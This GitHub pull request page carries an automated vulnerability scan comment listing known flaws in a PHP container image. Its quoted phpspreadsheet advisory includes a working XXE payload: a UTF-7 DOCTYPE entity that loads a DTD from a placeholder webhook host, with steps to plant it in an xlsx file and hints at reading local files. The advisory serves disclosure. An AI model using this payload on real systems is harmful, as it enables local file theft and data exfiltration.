-
Notifications
You must be signed in to change notification settings - Fork 2
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Try catches added #111
Try catches added #111
Conversation
👋 @bbrands02
|
🔍 Vulnerabilities of
|
digest | sha256:3b72d86ec8e0c4aabf7dfd120821bcd695d2459a5a38951c8f4dc881ec759b04 |
vulnerabilities | |
size | 255 MB |
packages | 316 |
📦 Base Image php:8.2-fpm-alpine
also known as |
|
digest | sha256:f445071227e858c52d0aab62372ad4a7b4f939584fd8df3ef04071f953571f1e |
vulnerabilities |
phpoffice/phpspreadsheet
|
Affected range | <2.2.1 |
Fixed version | 2.2.1 |
CVSS Score | 8.8 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
EPSS Score | 0.00043 |
EPSS Percentile | 0.09559 |
Description
Summary
Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)
Details
Check
$pattern = '/encoding="(.*?)"/';
easy to bypass. Just use a single quote symbol'
. So payload looks like this:<?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>
If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.
PoC
- Create simple xlsx file
- Rename xlsx to zip
- Go to the zip and open the
xl/sharedStrings.xml
file in edit mode.- Replace
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
to<?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
- Save
sharedStrings.xml
file and rename zip back to xlsx.- Use minimal php code that simply opens this xlsx file:
use PhpOffice\PhpSpreadsheet\IOFactory; require __DIR__ . '/vendor/autoload.php'; $spreadsheet = IOFactory::load("file.xlsx");
- You will receive the request to your
http://%webhook%/file.dtd
- Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.
Impact
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | <2.1.0 |
Fixed version | 2.1.0 |
CVSS Score | 5.4 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
EPSS Score | 0.00045 |
EPSS Percentile | 0.16332 |
Description
Summary
\PhpOffice\PhpSpreadsheet\Writer\Html
doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.PoC
Example target script:
<?php require 'vendor/autoload.php'; $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx"); $spreadsheet = $reader->load(__DIR__ . '/book.xlsx'); $writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); print($writer->generateHTMLAll());
Save this file in the same directory:
book.xlsxOpen index.php in a web browser. An alert should be displayed.
Impact
Full takeover of the session of users viewing spreadsheet files as HTML.
curl 8.9.0-r0
(apk)
pkg:apk/alpine/[email protected]?os_name=alpine&os_version=3.20
Affected range | <8.9.1-r0 |
Fixed version | 8.9.1-r0 |
EPSS Score | 0.00056 |
EPSS Percentile | 0.23801 |
Description
dompdf/dompdf 2.0.4
(composer)
pkg:composer/dompdf/[email protected]
OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
Affected range | <=2.0.4 |
Fixed version | Not Fixed |
Description
Improper Neutralization in dompdf/dompdf.
No description provided.